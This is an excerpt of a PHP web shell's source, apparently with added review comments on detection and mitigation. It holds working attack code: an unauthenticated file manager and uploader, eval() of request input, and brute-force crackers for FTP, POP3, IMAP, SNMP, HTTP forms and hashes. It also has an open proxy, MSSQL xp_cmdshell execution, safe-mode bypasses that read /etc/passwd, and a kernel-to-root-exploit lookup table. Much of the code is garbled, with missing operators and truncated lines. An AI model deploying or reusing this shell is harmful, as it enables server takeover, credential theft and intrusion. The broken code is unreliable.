    s ";else echo 'Nothing'; echo"${t6}Safe mode:$safemode${t8}Open base dir:$basedir${t6}DBMS:";$sq='';if(function_exists('mysql_connect')) $sq= "${mil}MySQL'>MySQL ";if(function_exists('mssql_connect')) $sq.= " ${mil}MSSQL'>MSSQL ";if(function_exists('ora_logon')) $sq.=" ${mil}Oracle'>Oracle ";if(function_exists('sqlite_open')) $sq.= ' SQLite ';if(function_exists('pg_connect')) $sq.= " ${mil}PostgreSQL'>PostgreSQL ";if

    (function_exists('msql_connect')) $sq.= ' mSQL ';if(function_exists('mysqli_connect'))$sq.= ' MySQLi ';if(function_exists('ovrimos_connect')) $sq.= ' Ovrimos SQL ';if ($sq=='') $sq= 'Nothing'; echo "$sq";}function checksuM($file){global $et;echo "MD5: ".md5_file($file).'
    SHA1:'.sha1_file($file)."$et";}function listdiR($cwd,$task){$c=getcwd();

    // Body of listdiR($cwd,$task): recursive directory walk. $task selects the action:
    //   0 list files and directories, 1 list writable entries, 2 writable files,
    //   3 writable directories, 4 files, 5 directories, 6 regex match on the name or on file
    //   contents, 7 substring match on the name or on file contents, 8 delete each entry and
    //   remove the directory.
    // NOTE(review): in case 6 $_REQUEST[search] is concatenated into the preg_match pattern
    // unescaped. Several conditions have lost an operator in extraction and one call name is
    // split across a line break.
    // After listdiR: stub definitions of posix_getpwuid() and posix_getgrgid() for when
    // checkfunctioN() reports them unavailable, and the start of filemanageR().
    $dh=opendir($cwd);while($cont=readdir($dh)){if($cont=='.' $cont=='..')continue;$adr=$cwd.DIRECTORY_SEPARATOR.$cont;switch($task){case '0':if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";break;case '1':if(is_writeable($adr)){if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";}break;case '2':if(is_file($adr) && is_writeable($adr))echo "[$adr]\n";break;

    case '3':if(is_dir($adr) && is_writeable($adr))echo "[$adr]\n";break;case '4':if(is_file($adr))echo "[$adr]\n";break;case '5':if(is_dir($adr))echo "[$adr]\n";break;case '6':if(preg_match('@'.$_REQUEST['search'].'@',$cont) (is_file($adr) && preg_match('@'.$_REQUEST['search'].'@',file_get_contents($adr)))){if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";}break;case '7':if(strstr($cont,$_REQUEST['search']) (is_file($adr) && strstr(file_g

    et_contents($adr),$_REQUEST['search']))){if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";}break;case '8':{if(is_dir($adr))rmdir($adr);else unlink($adr);rmdir($cwd);break;}}if(is_dir($adr))listdiR($adr,$task);}}if(!checkfunctioN('posix_getpwuid')){function posix_getpwuid($u){return 0;}}if(!checkfunctioN('posix_getgrgid')){function posix_getgrgid($g){return 0;}}function filemanageR(){global $windows,$msgbox,$errorbox,$t,$et,$cwd,$hcwd;$table="";$td1n="";$td2m="";


    // Continuation of filemanageR(). With task set it runs listdiR() over $cwd (search forces
    // task 7, re forces task 6). Otherwise it handles, straight from $_REQUEST:
    //   cP / mV / rN with deS -> copy(), copy() plus unlink(), or rename() to the destination
    //   deL                   -> unlink(), or listdiR(...,8) for a directory
    //   $_FILES[uploadfile]   -> move_uploaded_file() to the client-supplied file name,
    //                            used as given (a relative path)
    // No authentication, path restriction or file-type check is visible in this excerpt.
    // NOTE(review): the cP/mV/rN conditions have lost their operators in extraction.
    // Detection: multipart POSTs with a field named uploadfile, and the mixed-case parameter
    // names cP, mV, rN, deS and deL in access logs.
    $td1i="";$td2i="";$tdnr="";$tdw="";if(!empty($_REQUEST['task'])){if(!empty($_REQUEST['search']))$_REQUEST['task']=7;if(!empty($_REQUEST['re']))$_REQUEST['task']=6;

    echo '';listdiR($cwd,$_REQUEST['task']);echo '';}else{if(!empty($_REQUEST['cP']) !empty($_REQUEST['mV']) !empty($_REQUEST['rN'])){if(!empty($_REQUEST['cP']) !empty($_REQUEST['mV'])){$title='Destination';$ad=(!empty($_REQUEST['cP']))?$_REQUEST['cP']:$_REQUEST['mV'];$dis=(!empty($_REQUEST['cP']))?'Copy':'Move';}else{$ad=$_REQUEST['rN'];

    $title='New name';$dis='Rename';}if(!!empty($_REQUEST['deS'])){echo "$title:$td1n$td2m$hcwd$et";}else{if(!empty($_REQUEST['rN']))rename($ad,$_REQUEST['deS']);else{copy($ad,$_REQUEST['deS']);

    if(!empty($_REQUEST['mV']))unlink($ad);}}}if(!empty($_REQUEST['deL'])){if(is_dir($_REQUEST['deL']))listdiR($_REQUEST['deL'],8);else unlink($_REQUEST['deL']);}if(!empty($_FILES['uploadfile'])){move_uploaded_file($_FILES['uploadfile']['tmp_name'],$_FILES['uploadfile']['name']);echo "$msgboxUploaded! File name: ".$_FILES['uploadfile']['name']." Filesize: ".$_FILES['uploadfile']['size']. "$et
    ";}

    $select="--------


    decoration:none' href='#' onClick=\"HS('div');\">- ] Location:$et";$file=$dir=$link=array();if($dirhandle=opendir($cwd)){while($cont=readdir($dirhandle)){if(is_dir($cwd.DIRECTORY_SEPARATOR.$cont))$dir[]=$cont;

    elseif(is_file($cwd.DIRECTORY_SEPARATOR.$cont))$file[]=$cont;else $link[]=$cont;}closedir($dirhandle);sort($file);sort($dir);sort($link);echo "NameOwnerModification timeLast changeInfoSizeActions";$i=0;foreach($dir as $dn){echo '';$i++;$own='Unknow';$owner=posix_getpwuid(fileowner($dn));$mdate=date('Y/m/d H:i:s',filemtime($dn));$adate=date('Y/m/d H:i:s',fileatime($dn));$diraction=$select.hlinK('seC=fm&workingdiR='.realpath($dn))."'>OpenRenameRemove";

    if($owner)$own="".$owner['name'].'';if(($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}if(is_writeable($dn))echo $tdw;elseif(!is_readable($dn))echo $tdnr;else echo $cl2;echo "";if(strlen($dn)>45)echo substr($dn,0,42).'...';else echo $dn;echo '';echo $cl1."$own";echo $cl1."$mdate";echo $cl1."$adate";echo "$cl1";echo "";echo 'D';if(is_readable($dn))echo 'R';if(is_writeable($dn))echo 'W'

    ;echo '';echo "$cl1------";echo $cl2.$diraction;echo '';}foreach($file as $fn){echo '';$i++;$own='Unknow';$owner=posix_getpwuid(fileowner($fn));$fileaction=$select.hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."'>OpenEditDownloadHex viewImageInclude


    value='".hlinK("seC=checksum&filE=$fn&workingdiR=$cwd")."'>ChecksumCopyMoveRemove";$mdate=date('Y/m/d H:i:s',filemtime($fn));$adate=date('Y/m/d H:i:s',fileatime($fn));if($owner)$own="".$owner['name'].'';$size=showsizE(filesize($fn));if(($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}if(is_writeable($fn))echo $tdw;elseif(!is_readable($fn))echo $tdnr;else echo $cl2;echo "";if(strlen($fn)>45)echo substr($fn,0,42).'...';else echo $fn;echo '';echo $cl1."$own";echo $cl1."$mdate";echo $cl1."$adate";echo "$cl1";echo "";if(is_readable($fn))echo "R";if(is_writeable($fn))echo "W";if(is_ex

    ecutable($fn))echo "X";if(is_uploaded_file($fn))echo "U";echo "";echo "$cl1$size";echo $cl2.$fileaction;echo '';}foreach($link as $ln){$own='Unknow';$i++;$owner=posix_getpwuid(fileowner($ln));$linkaction=$select.hlinK("seC=openit&namE=$ln&workingdiR=$ln")."'>OpenEditDownloadHex viewImageIncludeChecksumCopyMoveRenameRemove";$mdate=date('Y/m/d H:i:s',filemtime($ln));$adate=date('Y/m/d H:i:s',fileatime($ln));if($owner)$own="".$owner['name'].'';echo '';

    $size=showsizE(filesize($ln));if(($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}if(is_writeable($ln))echo $tdw;elseif(!is_readable($ln))echo $tdnr;else echo $cl2;echo "";if(strlen($ln)>45)echo substr($ln,0,42).'...';else echo $ln;echo '';echo $cl1."$own";echo $cl1."$mdate";echo $cl1."$adate";echo "${cl1}";echo "L";if(is_readable($ln))echo "R";if (is_writeable($ln))echo "W";if(is_executable($ln))echo "X";echo "";echo "$cl1$size";

    echo $cl2.$linkaction;echo '';}


    // End of filemanageR(): entry counts and an upload size figure derived from
    // upload_max_filesize and post_max_size, followed by the search form labels.
    // imapchecK(), ftpchecK() and pop3checK() each test one username/password pair against
    // one host (IMAP on 143, FTP on 21, POP3 on 110) and return 1 on success, 0 on rejection
    // and -1 when the connection fails. imapchecK tags its LOGIN command with a uniqid value
    // prefixed NJ. pop3checK continues past the end of this block.
    // Mitigation pointers: account lockout or rate limiting on these services, and alerting
    // on repeated failed logins that originate from a web server address.
    }$dc=count($dir)-2;if($dc==-2)$dc=0;$fc=count($file);$lc=count($link);$total=$dc+$fc+$lc;$min=min(substr(ini_get('upload_max_filesize'),0,strpos(ini_get('post_max_size')

    ,'M')),substr(ini_get('post_max_size'),0,strpos(ini_get('post_max_size'),'M'))).' MB';echo "$tableFind:Regular expressions $hcwd$hcwdDisplay files and directories in current folderFind writable files and directories in current folderFindwritable files in current folderFind writable directories in current folderDisplay all files in current folderDisplay all directories in current folder$et
    Summery: Total: $total Directories: $dc Files: $fc Links: $lc$et$td1n$td2m$hcwd$td1n Note: Max allowed file size to upload on thisserver is $min$et$et";}}function imapchecK($host,$username,$password,$timeout){$sock=fsockopen($host,143,$n,$s,$timeout);$b=uniqid('NJ');$l=strlen($b);if(!$sock)return -1;fread($sock,1024);fputs($sock,"$b LOGIN $username $password\r\n");$res=fgets($sock,$l+4);

    fclose($sock);if($res=="$b OK")return 1;else return 0;}function ftpchecK($host,$username,$password,$timeout){$ftp=ftp_connect($host,21,$timeout);if(!$ftp)return -1;$con=ftp_login($ftp,$username,$password);if($con)return 1;else return 0;}function pop3checK($server,$user,$pass,$timeout){$sock=fsockopen($server,110,$en,$es,$timeout);if(!$sock)return -1;fread($sock,1024);

    fwrite($sock,"user $user\n");$r=fgets($sock);if($r{0}=='-')return 0;


    // Tail of pop3checK(): sends the password and returns 1 when the reply starts with +.
    // formcrackeR(): dictionary attack against an HTTP login form. Target URL, field names,
    // method, failure string and the dictionary path all come from $_REQUEST; each word (or
    // user:pass combo) is appended to the URL as query parameters and sent with check_urL(),
    // and a response that lacks the failure string is reported as a hit and optionally
    // appended to a log file via file_add_contentS().
    // Detection: repeated HTTP/1.0 requests to one login URL carrying credentials in the
    // query string, sent with only a Host header.
    // Mitigation pointers: lockout, rate limiting or a second factor on the login form.
    fwrite($sock,"pass $pass\n");$r=fgets($sock);fclose($sock);if($r{0}=='+')return 1;return 0;}function formcrackeR(){

    global $errorbox,$footer,$et,$hcwd;if(!empty($_REQUEST['start'])){if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0;$url=$_REQUEST['target'];$uf=$_REQUEST['userf'];$pf=$_REQUEST['passf'];$sf=$_REQUEST['submitf'];$sv=$_REQUEST['submitv'];$method=$_REQUEST['method'];$fail=$_REQUEST['fail'];$dic=$_REQUEST['dictionary'];

    $type=$_REQUEST['combo'];$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:'';if(!file_exists($dic))die("$errorbox Can not open dictionary.$et$footer");$dictionary=fopen($dic,'r');echo 'Cracking started...
    ';while(!feof($dictionary)){if($type){$combo=trim(fgets($dictionary)," \n\r");$user=substr($combo,0,strpos($combo,':'));$pass=substr($combo,strpos($combo,':')+1);}else{$pass=trim(fgets($dictionary)," \n\r");}

    $url.="?$uf=$user&$pf=$pass&$sf=$sv";$res=check_urL($url,$method,$fail,12);if(!$res){echo "U: $user P: $pass
    ";if($log)file_add_contentS($file,"U: $user P: $pass\r\n");if(!$type)break;}}fclose($dictionary);echo 'Done!
    ';}else echo "HTTP Form cracker:Dictionary:Dictionary type:Simple (P)Combo (U:P)Username:$hcwdAction Page:Method:POSTGETUsername field name:Password field name:


    4' bgcolor='#808080'>Submit name:Submit value:Fail string:Log $et";}function hashcrackeR(){global $errorbox,$t,$et,$hcwd;if(!empty($_REQUEST['hash']) && !empty($_REQUEST['dictionary']) && !empty($_REQUEST['type'])){if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0;$dictionary=fopen($_REQUEST['dictionary'],'r');

    // Body of hashcrackeR() from the point where the dictionary file has been opened:
    // upper-cases the requested hash, picks md5 or sha1 from the type parameter and compares
    // the hash of each dictionary word against it, stopping at the first match.
    // Defensive takeaway: unsalted MD5 or SHA-1 password hashes fall to exactly this kind of
    // lookup; password_hash() and password_verify() are the appropriate storage functions.
    // pr0xy() starts near the end of this block: it parses $_REQUEST[urL] into host, path and
    // directory for the fetch that follows.
    // NOTE(review): a form label is split across a line break inside a string below.
    if($dictionary){$hash=strtoupper($_REQUEST['hash']);echo 'Cracking '.htmlspecialchars($hash).'...
    ';$type=($_REQUEST['type']=='MD5')?'md5':'sha1';while(!feof($dictionary)){$word=trim(fgets($dictionary)," \n\r");if($hash==strtoupper(($type($word)))){echo "The answer is $word
    ";if($log)file_add_contentS($file,"$x\r\n");break;}}echo 'Done!';fclose($dictionary);}else{

    echo "$errorbox Can not open dictionary.$et";}}echo "${t}Hash cracker:Dictionary:Hash:Type:MD5SHA1L

    og $hcwd $et";}function pr0xy(){global $errorbox,$et,$footer,$hcwd;echo "Navigator: $hcwd$et";if(!empty($_REQUEST['urL'])){

    $u=parse_url($_REQUEST['urL']);$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';$dir=dirname($file);


    // Continuation of pr0xy(): fetches $_REQUEST[urL] server-side with getiT(), rewrites
    // href attributes through hlinK() (defined outside this excerpt) so that links keep
    // routing through this script, and echoes the result unescaped. In effect the host
    // becomes a web proxy for whoever can reach the script.
    // sqlclienT(): passes the caller-supplied server, credentials, database and query to
    // querY() and prints the returned rows; the query shown back in the form is HTML-escaped.
    // Detection: the mixed-case parameters urL, serveR, useR, pasS, dB, querY and typE in
    // access logs, and database connections from the web server to unexpected hosts.
    $con=getiT($_REQUEST['urL']);$s=array("href=mailto"=>"HrEf=mailto","HREF=mailto"=>"HrEf=mailto","href='mailto"=>"HrEf=\"mailto","HREF=\"mailto"=>"HrEf=\"mailto","href=\'mailto"=>"HrEf=\"mailto","HREF=\'mailto"=>"HrEf=\"mailto","href=\"http"=>"HrEf=\"".hlinK("seC=px&urL=http"),"href=\'http"=>"HrEf=\"".hlinK("seC=px&urL=http"),"HREF=\'http"=>"HrEf=\"".hlinK("seC=px&urL=http"),"href=http"=>"HrEf=".hlinK("seC=px&urL=http"),"HREF=http"=>"HrEf=".hlinK("seC=px&urL=http"),"href=\""=>"HrEf=\"".hlinK("seC=px&urL=h

    ttp://$host/$dir/"),"HREF=\""=>"HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),"href=\""=>"HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),'HREF="'=>'HrEf="'.hlinK("seC=px&urL=http://$host/$dir/"),"href="=>"HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),"HREF="=>"HrEf=".hlinK("seC=px&urL=http://$host/$dir/"));$con=replace_stR($s,$con);echo $con;}}function sqlclienT(){global $t,$errorbox,$et,$hcwd;if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){

    $server=$_REQUEST['serveR'];$type=$_REQUEST['typE'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY'];$db=(empty($_REQUEST['dB']))?'':$_REQUEST['dB'];$res=querY($type,$server,$user,$pass,$db,$query);if($res){$res=str_replace('-----','',$res);$res=str_replace('+++++','',$res);$r=explode('[+][+][+]',$res);$r[1]=str_replace('[-][-][-]',"",$r[1]);echo "".$r[1].''.$r[0]."$et
    ";}else{

    echo "$errorbox Failed!$et
    ";}}if(empty($_REQUEST['typE']))$_REQUEST['typE']='';echo "${t}SQL cilent:MySQLMSSQLOraclePostgreSQLServer:Username:Password:Database:Query:";if (!empty($_REQUEST['querY'])) echo htmlspecialchars(($_REQUEST['querY']));else echo 'SHOW DATABASES'; echo "$hcwd


    class=buttons type=submit value='Submit Query'>$et";}function querY($type,$host,$user,$pass,$db='',$query){$res='';switch($type){case 'MySQL':if(!function_exists('mysql_connect'))return 0;

    $link=mysql_connect($host,$user,$pass);if($link){if(!empty($db))mysql_select_db($db,$link);$result=mysql_query($query,$link);while($data=mysql_fetch_row($result))$res.=implode('-----',$data).'+++++';$res.='[+][+][+]';for($i=0;$i


    return $res;}break;}return 0;}
    /*
     * phpevaL(): passes the 'code' request parameter to eval().
     * replace_stR() (defined outside this excerpt) is applied first with the
     * map $s; as printed here the map is array(''=>''), so whatever it
     * originally replaced cannot be recovered from this listing.
     * htmlspecialchars() wraps only eval()'s return value; anything the
     * evaluated code prints itself is emitted as-is.
     * eval is a language construct, so a disable_functions entry does not
     * block it. The dispatcher reaches this handler through the action code
     * 'eval'; together with the parameter name 'code' that is the request
     * pattern to look for in access logs.
     */
    function phpevaL(){

    global $t,$hcwd,$et;echo '';if(!empty($_REQUEST['code'])){$s=array(''=>'');echo "";echo htmlspecialchars(eval(replace_stR($s,$_REQUEST['code'])));echo '

    ';}echo "${t}Evaler:Codes:";if(!empty($_REQUEST['code']))echo htmlspecialchars($_REQUEST['code']);echo "$hcwd$et";}
    /*
     * rootxpL(): looks the running kernel up in a hard-coded table.
     * php_uname() is searched with strstr() for each key in array order and
     * the value of the first key found is returned; 0 means no key matched.
     * Keys are 2.6.x, 2.4.x and 2.2.x version strings, each family ending with
     * its bare prefix ('2.6.', '2.4.', '2.2.') as a catch-all; values are
     * comma-separated name lists.
     * strstr() scans the whole uname string, so a key can also match text
     * outside the release field.
     * The literal table is a stable static indicator when scanning files for
     * this shell.
     */
    function rootxpL(){$v=php_uname();$db=array('2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh,raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2, h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3, krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad, krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'

    elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace,uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx,kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip, ptrace');foreach($db as $k=>$x)if(strstr($v,$k))return $x;return 0;}

    /*
     * toolS(): three request-driven helpers behind one handler.
     *  1. 'serveR' + 'domaiN': opens TCP port 43 on the given server (5 s
     *     timeout), sends the domain followed by CRLF and echoes the reply,
     *     i.e. a WHOIS lookup. The fsockopen() result is used without being
     *     checked, and the reply is echoed without escaping.
     *  2. 'urL': connects to the URL's host and port (80 when none is given);
     *     the request itself and the header echo are on the lines that follow
     *     this block. $u['host'] is read without checking that it exists.
     *  3. 'ouT' + 'uN' + 'pW': handled further down in the same function.
     * Server, host and port all come straight from the request, so every
     * connection made here originates from the web server; egress filtering
     * and outbound connection logs are where this activity becomes visible.
     */
    function toolS(){global $t,$hcwd,$et,$cwd;if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['domaiN'])){$ser=fsockopen($_REQUEST['serveR'],43,$en,$es,5);fputs($ser,$_REQUEST['domaiN']."\r\n");echo '';while(!feof($ser))echo fgets($ser,1024);echo '';fclose($ser);}elseif(!empty($_REQUEST['urL'])){$h='';$u=parse_url($_REQUEST['urL']);

    $host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';$port=(empty($u['port']))?80:$u['port'];$ser=fsockopen($host,$port,$en,$es,5);


    // toolS(), 'urL' branch: sends "GET <path>" plus a Host header over the
    // socket opened just above and echoes the reply line by line until the
    // first bare CRLF, i.e. the response headers. The lines are echoed
    // without escaping.
    if($ser){fputs($ser,"GET $file\r\nHost: $host\r\n\r\n");echo '';while($h!="\r\n"){$h=fgets($ser,1024);echo $h;}echo '';fclose($ser);}

    /*
     * toolS(), '.ht* generator' branch: writes <ouT>/.htpasswd containing
     * "<uN>:<crypt(pW)>" and <ouT>/.htaccess enabling Basic authentication.
     * 'ouT' is a request-supplied directory used without any check.
     * CRYPT_STD_DES is PHP's availability flag for the DES scheme, not a salt
     * value; it is passed here in crypt()'s salt position.
     * Incident-response artifact: an unexpected .htaccess/.htpasswd pair whose
     * .htaccess uses CRLF line endings and reads AuthName "Secure",
     * AuthType Basic, AuthUserFile <path>, Require valid-user.
     */
    }elseif(!empty($_REQUEST['ouT']) && isset($_REQUEST['pW'])&& !empty($_REQUEST['uN'])){$htpasswd=$_REQUEST['ouT'].DIRECTORY_SEPARATOR.'.htpasswd';$htaccess=$_REQUEST['ouT'].DIRECTORY_SEPARATOR.'.htaccess';file_put_contents($htpasswd,$_REQUEST['uN'].':'.crypt(trim($_REQUEST['pW']),CRYPT_STD_DES));file_put_contents($htaccess,"AuthName \"Secure\"\r\nAuthType Basic\r\nAuthUserFile $htpasswd\r\nRequire valid-user\r\n");echo 'Done';}$s="";echo "${t}WhoIs:${s}Server:domain:$hcwd$et
    ${t}.ht* generator:${s}Username:Password:Directory:$hcwd$et
    ${t}Grab header:${s}URL:$hcwd$et
    ";}function hexvieW(){

    if(!empty($_REQUEST['filE'])){$f=$_REQUEST['filE'];echo "OffsetHexASCII";$file=fopen($f,'r');$i=-1;while(!feof($file)){$ln='';$i++;echo "";echo str_repeat('0',(8-strlen($i*16))).$i*16;echo '';echo "


    echo "'>";for($j=0;$j


    echo "$pr$i:(mb_send_mail$po";if(file_exists('/tmp/mb_send_mail'))unlink('/tmp/mb_send_mail');mb_send_mail(NULL, NULL, NULL, NULL,'-C $file -X /tmp/mb_send_mail');readfile('/tmp/mb_send_mail');$i++;}if(function_exists('curl_init')){

    echo "$pr$i:(curl_init [A]$po";$fh=curl_init('file://'.$file.'');$tmp=curl_exec($fh);echo $tmp;$i++;echo "$pr$i:(curl_init [B]$po";$i++;if(strstr($file,DIRECTORY_SEPARATOR))$ch=curl_init('file:///'.$file."\x00/../../../../../../../../../../../../".__FILE__);else $ch=curl_init('file://'.$file."\x00".__FILE__);var_dump(curl_exec($ch));}

    if(is_writable('.')){echo "$pr$i:(php.ini$po";file_put_contents('php.ini','safe_mode = Off');readfile($file);unlink('php.ini');$i++;}if(extension_loaded('perl')){echo "$pr$i:(perl$po";echo perlshelL("type \"$file\"");$i++;}if(is_object($ws=new COM('WScript.Shell'))){

    echo "$pr$i:(COM$po";echo comshelL("type \"$file\"",$ws);$i++;}if(extension_loaded('ffi') && $windows){echo "$pr$i:(FFI$po";echo ffishelL("type \"$file\"");$i++;}if(checkfunctioN('win_shell_execute')){echo "$pr$i:(win32std$po";echo winshelL("type \"$file\"");

    $i++;}if(checkfunctioN('win32_create_service')){echo "$pr$i:(win32service$po";echo srvshelL("type \"$file\"");$i++;}if(function_exists('imap_open')){echo "$pr$i:(imap [A]$po";$str=imap_open('/etc/passwd','','');$list=imap_list($str,$file,'*');for($i=0;$i


    $tmp=imap_body($str,1);echo $tmp;imap_close($str);$i++;}if($file=='/etc/passwd'){echo "$pr$i:(posix$po";

    for($uid=0;$uid1)$list=imap_list($str,trim($s[0]),trim($s[1]));else $list=imap_list($str,trim($str[0]),'*');for($i=0;$i


    echo '';}elseif(!empty($_REQUEST['serveR']) && !empty($_REQUEST['coM']) && !empty($_REQUEST['dB']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS'])){$res='';$tb=uniqid('NJ');$db=mssql_connect($_REQUEST['serveR'],$_REQUEST['useR'],$_REQUEST['pasS']);

    mssql_select_db($_REQUEST['dB'],$db);mssql_query("create table $tb ( string VARCHAR (500) NULL)",$db);mssql_query("insert into $tb EXEC master.dbo.xp_cmdshell '".$_REQUEST['coM']."'",$db);$re=mssql_query("select * from $tb",$db);while(($row=mssql_fetch_row($re))){$res.= $row[0]."\r\n";}mssql_query("drop table $tb",$db);mssql_close($db);echo "$res
    ";

    }$f=(!empty($_REQUEST['file']))?htmlspecialchars($_REQUEST['file']):'/etc/passwd';$u=(!empty($_REQUEST['user']))?htmlspecialchars($_REQUEST['user']):'root';$p=(!empty($_REQUEST['pass']))?htmlspecialchars($_REQUEST['pass']):'123456';$d=(!empty($_REQUEST['db']))?htmlspecialchars($_REQUEST['db']):'test';echo "${t}Use PHP Bugs:File:$hcwd$et
    ${t}Use MySQL:File:Username:Password:Database:$hcwd$et
    ${t}MSSQL Exec:Server:Username:Password:Command:Database:$hcwd$et";}function crackeR(){

    global $errorbox,$t,$et,$crack,$cwd;$check=(!empty($_REQUEST['dictionary']) && !empty($_REQUEST['target']))?1:0;if(!empty($_REQUEST['cracK']) && !$check){


    /*
     * crackeR(), continued (the function header sits above this block).
     * With 'cracK' set but no dictionary/target, only the form for that
     * protocol is printed. With both present, the handler name is built as
     * strtolower($_REQUEST['cracK']).'checK' and invoked as a variable
     * function: $pro($target,$user,$pass,5). Nothing here limits the value to
     * the protocols listed in the menu, so the request decides which *checK
     * function runs.
     * Return convention visible below: -1 = connection failure (loop stops),
     * truthy = credentials accepted, anything else = next wordlist line.
     * 'combo' switches between one password per line and user:password per
     * line; without it the loop stops at the first hit.
     * Hits are echoed unescaped and, when 'loG' and 'logfilE' are set,
     * appended to that request-supplied path as "U: <user> P: <pass>".
     */
    $c=htmlspecialchars($_REQUEST['cracK']);echo "$t$c cracker:$crack";}elseif(!empty($_REQUEST['cracK']) && $check){$pro=strtolower($_REQUEST['cracK']).'checK';$target=$_REQUEST['target'];$type=$_REQUEST['combo'];

    $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:'';$dictionary=fopen($_REQUEST['dictionary'],'r');if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0;if($dictionary){echo 'Cracking '.htmlspecialchars($target).'...
    ';while(!feof($dictionary)){if($type){$combo=trim(fgets($dictionary)," \n\r");$user=substr($combo,0,strpos($combo,':'));$pass=substr($combo,strpos($combo,':')+1);}else{

    $pass=trim(fgets($dictionary)," \n\r");}$ret=$pro($target,$user,$pass,5);if($ret==-1){echo "$errorbox Can not connect to server.$et";break;}else{if($ret){$x="U: $user P: $pass";echo "$x
    ";if($log)file_add_contentS($file,"$x\r\n");if(!$type)break;}}}echo '
    Done';fclose($dictionary);}else{echo "$errorbox Can not open dictionary.$et";}

    }else{echo "[Hash] - [SMTP] - [POP3] - [IMAP]- [FTP] - [SNMP] - [MySQL] - [MSSQL] - [HTTP Form] - [HTTP Auth(basic)] - [Dictionary maker]$et";}}
    /*
     * snmpcrackeR(): passes every line of the wordlist named by 'dictionary'
     * to snmpchecK($target,$com,2) (defined outside this excerpt) and prints
     * each value for which the call returns something truthy. Unlike the loop
     * in crackeR() there is no break, so the whole wordlist is always tried.
     * Accepted values are echoed unescaped and, when 'loG' and 'logfilE' are
     * set, appended to that path one per line.
     * NOTE(review): presumably $com is an SNMP community string and the third
     * argument a timeout; confirm against snmpchecK().
     */
    function snmpcrackeR(){global $t,$et,$errorbox,$hcwd;if(!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){$target=$_REQUEST['target'];if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0;$dictionary=fopen($_REQUEST['dictionary'],'r');if($dictionary){echo 'Cracking '.htmlspecialchars($target).'...
    ';while(!feof($dictionary)){

    $com=trim(fgets($dictionary)," \n\r");$res=snmpchecK($target,$com,2);if($res){echo "$com
    ";if($log)file_add_contentS($file,"$com\r\n");}


    }echo '
    Done';fclose($dictionary);}else{echo "$errorbox Can not open dictionary.$et";}

    }else echo "${t}SNMP cracker:$hcwdDictionary:Server:Log $et";}function dicmakeR(){

    global $errorbox,$windows,$footer,$t,$et,$hcwd;$combo=(empty($_REQUEST['combo']))?0:1;if(!empty($_REQUEST['range'])&& !empty($_REQUEST['output']) && !empty($_REQUEST['min']) && !empty($_REQUEST['max'])){$min=$_REQUEST['min'];$max=$_REQUEST['max'];if($max


    $user=trim(fgets($in)," \n\r");if(!strstr($user,':'))continue;$user=substr($user,0,(strpos($user,':')));if($combo)fwrite($output,$user.':'.$user."\n");else fwrite($output,$user."\n");}fclose($input);fclose($output);echo 'Done';

